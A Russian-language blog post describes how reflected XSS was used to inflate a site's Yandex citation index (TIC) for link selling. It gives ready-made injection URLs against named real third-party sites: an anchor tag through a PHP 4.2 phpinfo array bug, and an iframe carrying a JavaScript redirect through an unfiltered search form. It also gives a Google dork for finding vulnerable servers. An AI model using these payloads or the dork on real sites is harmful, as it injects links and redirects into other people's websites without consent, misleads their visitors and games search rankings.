Уже не новость, что наращивание индекса цитирования при помощи XSS не актуально. Наконец то, яндекс прикрыл эту фишку. Вообще кому XSS было выгодно? Прежде всего продавцам площадок на sape. Они поднимали себе ТИЦ до четырехзначных цифр и новички как пчелы на мед слетались и скупали у них ссылки, как им казалось: «очень дешево». Кто пострадал? Те кто кинулись скупать базы и парсеры, те кто платили по 1$ за 1 ТИЦ, наращенный с помощью XSS. Всё вполне логично, тема слишком сильно засветилась, неужели не было ясно, что этот баг скоро прикроют?!

Поэтому сейчас можно без зазрения совести выкладывать сам алгоритм и то, как можно было поднимать себе настроение ТИЦ.

Вобщем основная загвоздка была в косяке PHP ver. 4.2.*, а конкретно в косяке с phpinfo и обработке переменной-массива x[](вместо x может быть написано любое имя переменной) в итоге можно было прописать на странице линк на свой сайт. Делалось это таким образом: http://mynonamesait.com/phpinfo.php?perem[]=<сюда вставляется специально заготовленный линк на собственный сайт> и этот же линк мы скармливаем поисковикам. Сейчас покажу на конкретном примере:

http://sirad.pd.infn.it/people/yulei/phpinfo.php?perem[]=%3Ca+href=//zlob.in%3EHello+World%3C/a%3E

Искать подобные сайты можно было без проблем в том же гугле, например таким запросом inurl:phpinfo.php “PHP Version 4.2?

Ниже прилагается простенький парсер, написанный Ильёй Колесниковым, одним из членов CreaStar Group. Его работа заключается в получении запроса и количества страниц для вывода поисковых результатов через гугл. Правда этот скрипт предназначен лишь для тестирования (не работает со сложными запросами) и нуждается в частичной доработке, но понять суть он вам поможет. Скачать

Ещё один из способов заключается в том, что некоторые web-мастера не фильтруют данные в поисковых формах на своём сайте, в итого туда можно точно также вставить линк на свой сайта или же ещё круче – поставить автоматический редирект через JavaScript. Пример, у меня на блоге есть страница http://zlob.in/1.html которая автоматически пересылает на главную. В неё прописан такой код: <body onload=»window.parent.location.href=’http://zlob.in’;»>. Далее мы ищем сайт с косячным поиском и через iframe делаем подобную штуку http://bme.wustl.edu/search.asp?query=%3Ciframe%20src=//zlob.in/1.html%3E

p.s. не забывайте заменять пробелы, кавычки и прочие символы, которые нельзя напрямую использовать в адресной строке браузера на соответствующие им альтернативы при помощи функций urlencode() или rawurlencode() в php, подробнее про url можно почитать в rfc 1738.

Может быть Вам это интересно?

• YouTube API & JavaScript Upload
• Полезные интернет-сервисы
• Полезно почитать
• акция – лого для блога
• Кризис